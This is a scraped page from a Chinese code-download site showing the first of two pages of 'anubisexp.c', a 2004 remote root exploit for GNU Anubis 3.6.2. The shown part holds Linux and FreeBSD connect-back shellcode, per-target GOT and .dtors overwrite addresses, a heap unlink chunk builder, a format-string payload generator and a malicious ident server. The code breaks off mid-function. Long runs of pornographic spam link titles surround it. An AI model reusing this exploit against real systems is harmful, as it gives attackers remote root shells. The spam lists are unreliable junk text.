亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? gnu anubis 3.6.2 remote buffer overflow root exploit.txt

?? 一些可以實現(xiàn)益出的程序
?? TXT
?? 第 1 頁 / 共 2 頁
字號:


/*
 * anubisexp.c
 *
 * GNU Anubis 3.6.2 remote root exploit by CMN
 *
 * <cmn at darklab.org>, <cmn at 0xbadc0ded.org>
 * Bug found by Ulf Harnhammar.
 *
 * 2004-03-10
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/param.h>
#include <sys/wait.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define DUMMY            0x41414141
#define BUFSIZE          512
#define AUTH_PORT        113
#define ANUBIS_PORT      24
#define IP_INDEX         5
#define PORT_INDEX       11

#define PREV_INUSE       0x1
#define IS_MMAP          0x2
#define NON_MAIN_ARENA   0x4
#define FMTSTR           0x1
#define OVERFLOW         0x2

#define JMPCODE          "\xeb\x0c"

static int connect_target = 0;
static int start_auth = 0;

    /* Connect back */
static char linux_code[] =
    "\x31\xc0\x50\x50\x68\xc0\xa8\x01\x01\x66\x68\x30\x39\xb0\x02"
    "\x66\x50\x89\xe6\x6a\x06\x6a\x01\x6a\x02\x89\xe1\x31\xdb\x43"
    "\x30\xe4\xb0\x66\xcd\x80\x89\xc5\x6a\x10\x56\x55\x89\xe1\xb3"
    "\x03\xb0\x66\xcd\x80\x89\xeb\x31\xc9\x31\xc0\xb0\x3f\xcd\x80"
    "\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x31\xd2\x52\x68\x2f"
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
    "\x0b\xcd\x80\x31\xc0\x40\xcd\x80";

    /* Connect back */
static char freebsd_code[] =
    "\x31\xc0\x50\x50\x68\xc0\xa8\x01\x01\x66\x68\x30\x39\xb4\x02"
    "\x66\x50\x89\xe2\x66\x31\xc0\x50\x40\x50\x40\x50\x50\x30\xe4"
    "\xb0\x61\xcd\x80\x89\xc7\x31\xc0\xb0\x10\x50\x52\x57\x50\xb0"
    "\x62\xcd\x80\x50\x57\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x57\x50"
    "\x83\xc0\x59\xcd\x80\xb0\x02\x50\x57\x50\x83\xc0\x58\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    "\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0\x40"
    "\x50\x50\xcd\x80";

struct target {
    char type;
    char *desc;
    char *code;
    u_int bufaddr;  /* static buf on line 266 in net.c, used by recv() */
    u_int retloc;
    u_int offset;
    u_int written;
    u_int pad;
};


struct target targets[] = {
    /* .GOT free */
    { OVERFLOW, "Linux anubis-3.6.2-1.i386.rpm [glibc < 3.2.0] (overflow)",
        linux_code, 0x08056520, 0x08056464, 305, 0x00, 0x00 },

    /* .GOT strlen */
    { FMTSTR, "Linux anubis-3.6.2-1.i386.rpm (fmt, verbose)", linux_code,
        0x08056520, 0x080563bc, 10*4, 32, 1 },

    /* .dtors */
    { FMTSTR, "FreeBSD anubis-3.6.2_1.tgz (fmt)", freebsd_code,
        0x805db80, 0x0805cc10+4, 12*4, 20, 1 },

    /* .GOT getpwnam */
    { FMTSTR, "FreeBSD anubis-3.6.2_1.tgz (fmt, verbose)", freebsd_code,
        0x805db80, 0x0805ce18, 15*4, 32, 1 },

    { -1, NULL, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }
};


int
sock_connect(u_long ip, u_short port)
{
    struct sockaddr_in taddr;
    int sock_fd;

    memset(&taddr, 0x00, sizeof(struct sockaddr_in));
    taddr.sin_addr.s_addr = ip;
    taddr.sin_port = port;
    taddr.sin_family = AF_INET;

    if ( (sock_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("** socket()");
        return(-1);
    }

    if (connect(sock_fd, (struct sockaddr *)&taddr,
            sizeof(taddr)) < 0) {
        perror("** connect()");
        return(-1);
    }
    return(sock_fd);
}


long
net_inetaddr(u_char *host)
{
    long haddr;
    struct hostent *hent;

    if ( (haddr = inet_addr(host)) < 0) {
        if ( (hent = gethostbyname(host)) == NULL)
            return(-1);

        memcpy(&haddr, (hent->h_addr), 4);
    }
    return(haddr);
}

long
net_localip(void)
{
    u_char lname[MAXHOSTNAMELEN +1];
    struct in_addr addr;
    memset(lname, 0x00, sizeof(lname));

    if ( gethostname(lname, MAXHOSTNAMELEN) < 0)
        return(-1);

    addr.s_addr = net_inetaddr(lname);
    return(addr.s_addr);
}


char *
unlinkchunk(u_int ret, u_int retloc, size_t words)
{
    u_int *chunk;
    size_t i=0;

    if (words < 14) {
        fprintf(stderr, "unlinkchunk(): Small buffer\n");
        return(NULL);
    }

    if ( (chunk = calloc(words*sizeof(u_int)+1, 1)) == NULL) {
        perror("calloc()");
        return(NULL);
    }

    chunk[i++] = -4;
    chunk[i++] = -4;
    chunk[i++] = -4;
    chunk[i++] = ret;
    chunk[i++] = retloc-8;

    chunk[i++] = -4;
    chunk[i++] = -4;
    chunk[i++] = -4;
    chunk[i++] = ret;
    chunk[i++] = retloc-8;

    for (; i<words; i++) {

        /* Relative negative offset to first chunk */
        if (i % 2)
            chunk[i] = ((-(i-8)*4) & ~(IS_MMAP|NON_MAIN_ARENA))|PREV_INUSE;
        /* Relative negative offset to second chunk */
        else
            chunk[i] = ((-(i-3)*4) & ~(IS_MMAP|NON_MAIN_ARENA))|PREV_INUSE;
    }
    return((char *)chunk);
}

int
mkfmtstr(struct target *tgt, u_int ret,
        char *buf, size_t buflen)
{
    size_t pad;
    size_t espoff;
    size_t written;
    int tmp;
    int wb;
    int i;

    if (buflen < 50) {
        fprintf(stderr, "mkfmtstr(): small buffer\n");
        return(-1);
    }
    memset(buf, 'P', tgt->pad % 4);
    buf += tgt->pad % 4;
    written = tgt->written;

    /* Add dummy/retloc pairs */
    *(u_long *)buf = DUMMY;
    *(u_long *)(buf +4) = tgt->retloc;
    buf += 8;
    *(u_long *)buf = DUMMY;
    *(u_long *)(buf +4) = tgt->retloc+1;
    buf += 8;
    *(u_long *)buf = DUMMY;
    *(u_long *)(buf +4) = tgt->retloc+2;
    buf += 8;
    *(u_long *)buf = DUMMY;
    *(u_long *)(buf +4) = tgt->retloc+3;
    buf += 8;
    buflen -= 32;
    written += 32;

    /* Stackpop */
    for (espoff = tgt->offset; espoff > 0; espoff -= 4) {
        snprintf(buf, buflen, "%%08x");
        buflen -= strlen("%08x");
        buf += strlen("%08x");
        written += 8;
    }

    /* Return address */
    for (i=0; i<4; i++) {
        wb = ((u_char *)&ret)[i] + 0x100;
        written %= 0x100;
        pad = (wb - written) % 0x100;
        if (pad < 10)
                pad += 0x100;
        tmp = snprintf(buf, buflen,
            "%%%du%%n", pad);
        written += pad;
        buflen -= tmp;
        buf += tmp;
    }

    return(buflen >= 0 ? written : -1);
}


int
evil_auth(u_short port, char *ident, size_t identlen)
{
    struct sockaddr_in client;
    struct sockaddr_in laddr;
    u_int addrlen = sizeof(struct sockaddr_in);
    int lsock, csock;
    char input[128];

    if ( (lsock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("** socket()");
        return(-1);
    }

    memset(&laddr, 0x00, sizeof(struct sockaddr_in));
    laddr.sin_family = AF_INET;
    laddr.sin_port = port;
    laddr.sin_addr.s_addr = INADDR_ANY;

    if (bind(lsock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {
        perror("** bind()");
        return(-1);
    }

    if (listen(lsock, 1) < 0) {
        perror("** listen()");
        return(-1);
    }

    printf("[*] Awaiting auth connection\n");
    if ( (csock = accept(lsock, (struct sockaddr *)&client,
            &addrlen)) < 0) {
        fprintf(stderr, "** Connection error\n");
        return(-1);
    }

    if (getpeername(csock, (struct sockaddr *)&client, &addrlen) < 0)
        perror("** getpeername()");
    else
        printf("[*] %s:%u connected to auth\n",
            inet_ntoa(client.sin_addr), ntohs(client.sin_port));

    if (read(csock, input, sizeof(input)) <= 0) {
        perror("** write()");
        return(1);
    }

    printf("[*] Sending evil ident\n");

    if (write(csock, ident, identlen) != identlen) {
        perror("** write()");
        return(1);
    }

    if (close(csock) < 0 || close(lsock < 0)) {
        perror("** close()");
        return(1);
    }

    return(0);
}

void
signal_handler(int signo)
{
    if (signo == SIGUSR1) {
        start_auth++;
        connect_target++;
    }
    else if (signo == SIGALRM) {
        fprintf(stderr, "** Timed out while waiting for connect back\n");
        kill(0, SIGTERM);
        exit(EXIT_FAILURE);
    }
}


int
get_connectback(pid_t conn, int lsock)
{
    char inbuf[8192];

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
极品瑜伽女神91| 99r国产精品| 欧美日韩在线播放一区| 亚洲国产精品成人综合色在线婷婷| 精品一区二区免费在线观看| 日韩一区二区免费在线观看| 免费在线观看日韩欧美| 精品人在线二区三区| 欧美三级欧美一级| 国产精品第一页第二页第三页| 高清在线成人网| 自拍偷拍亚洲欧美日韩| 欧美午夜不卡在线观看免费| 日韩 欧美一区二区三区| 日韩欧美一区二区视频| 丁香五精品蜜臀久久久久99网站| 中文字幕一区不卡| 欧美军同video69gay| 免费成人深夜小野草| 国产午夜亚洲精品不卡| 色综合视频在线观看| 日韩国产欧美在线观看| 久久色在线视频| 91国产免费看| 蜜桃一区二区三区在线观看| 久久久777精品电影网影网| av网站免费线看精品| 水野朝阳av一区二区三区| xf在线a精品一区二区视频网站| 成人免费视频国产在线观看| 亚洲欧美乱综合| 亚洲成a人片在线不卡一二三区| 欧美极品另类videosde| 成人av免费网站| 天天综合网 天天综合色| 久久久午夜精品| 欧美午夜宅男影院| 国产乱一区二区| 亚洲成av人片一区二区三区| 久久久久97国产精华液好用吗| 色欧美88888久久久久久影院| 蜜臀av性久久久久蜜臀aⅴ流畅| 中文字幕一区二区三区在线播放| 欧美乱妇15p| 成人av综合在线| 久久99精品久久久久久国产越南| 国产精品不卡一区二区三区| 欧美成人综合网站| 日本道免费精品一区二区三区| 国内精品久久久久影院色| 亚洲在线一区二区三区| 国产精品天干天干在观线| 欧美一区二区福利视频| 日本精品免费观看高清观看| 国产99久久久精品| 另类欧美日韩国产在线| 亚洲国产三级在线| 亚洲色图制服诱惑 | 成人av资源在线观看| 日产精品久久久久久久性色| 亚洲另类一区二区| 国产精品午夜在线观看| 精品国产成人系列| 欧美老年两性高潮| 欧美日韩亚洲综合在线| 91浏览器在线视频| 99精品黄色片免费大全| 国产·精品毛片| 国产精品一区一区三区| 麻豆免费精品视频| 欧美aⅴ一区二区三区视频| 亚洲一区二区三区不卡国产欧美 | 日韩毛片精品高清免费| 国产日韩精品一区二区三区| 日韩久久免费av| www国产精品av| 日韩免费高清视频| 日韩欧美专区在线| 日韩欧美一区二区在线视频| 欧美一级久久久| 91老师片黄在线观看| 久久一夜天堂av一区二区三区| 欧美亚洲综合色| 一本色道综合亚洲| 91美女片黄在线观看91美女| 99视频一区二区| av在线播放成人| 色哟哟在线观看一区二区三区| 成人av电影在线| 色综合中文字幕国产| 成人高清视频免费观看| 成人午夜视频免费看| 成人激情免费网站| 91色九色蝌蚪| 欧美性一区二区| 日韩一区二区三区高清免费看看| 日韩欧美一级精品久久| 久久亚区不卡日本| 国产精品久久看| 一区二区三区精品在线| 日韩高清不卡一区二区三区| 老色鬼精品视频在线观看播放| 精品一区中文字幕| 国产v日产∨综合v精品视频| 91美女片黄在线观看91美女| 欧美日韩激情在线| 国产午夜精品久久| 奇米一区二区三区| 国产一区二区h| av不卡在线观看| 欧美三级乱人伦电影| 精品日本一线二线三线不卡| 中文字幕av一区二区三区| 亚洲欧美日韩国产综合在线| 午夜精品久久久久久久蜜桃app| 卡一卡二国产精品 | 国产精品996| 成人精品一区二区三区四区| 欧洲精品视频在线观看| 日韩精品一区二区在线观看| 亚洲欧洲av一区二区三区久久| 亚洲大片在线观看| 激情小说欧美图片| 91色porny在线视频| 精品久久久久久久人人人人传媒| 亚洲欧美在线视频| 蓝色福利精品导航| 日本电影欧美片| 久久久久国产精品免费免费搜索| 亚洲一二三四久久| 国产福利一区二区三区视频在线 | 亚洲永久免费av| 国产成人亚洲精品青草天美| 精品视频一区二区不卡| 亚洲国产精品精华液ab| 日本 国产 欧美色综合| 色综合久久88色综合天天免费| 欧美成人午夜电影| 亚洲高清免费观看| 99久久精品一区二区| 精品国产一区二区三区不卡| 亚洲国产精品视频| av爱爱亚洲一区| 国产亚洲一区二区在线观看| 免费观看日韩电影| 欧美性色黄大片手机版| 国产精品美女久久久久久2018| 精品综合久久久久久8888| 精品1区2区3区| 悠悠色在线精品| www.av亚洲| 国产嫩草影院久久久久| 久久成人免费日本黄色| 911国产精品| 亚洲第一综合色| 色噜噜久久综合| 亚洲视频免费观看| 成人一区二区三区| 久久久精品2019中文字幕之3| 六月丁香婷婷色狠狠久久| 欧美日韩国产综合草草| 亚洲综合激情网| 在线观看亚洲精品视频| 亚洲欧美日韩电影| 色视频一区二区| 亚洲精品国产视频| 色美美综合视频| 亚洲精品乱码久久久久久日本蜜臀| 99久久夜色精品国产网站| 国产精品久久看| bt欧美亚洲午夜电影天堂| 国产精品丝袜久久久久久app| 国产一区二区三区免费在线观看| 精品久久一区二区三区| 麻豆国产91在线播放| 日韩欧美国产综合| 久久精品国产精品青草| 2021国产精品久久精品| 国产精品资源在线看| 国产清纯白嫩初高生在线观看91 | 久久久www免费人成精品| 精品一区二区综合| 久久久久88色偷偷免费| 成人免费毛片aaaaa**| 国产精品久久久久毛片软件| 色综合久久久久久久久| 亚洲国产精品一区二区久久 | 日韩亚洲国产中文字幕欧美| 免费日本视频一区| 久久精品一区二区| 99在线视频精品| 亚洲电影第三页| 精品国产a毛片| 不卡一二三区首页| 亚洲国产精品一区二区久久恐怖片 | 成人三级在线视频| 亚洲日本免费电影| 在线不卡欧美精品一区二区三区| 久热成人在线视频| 国产精品乱人伦|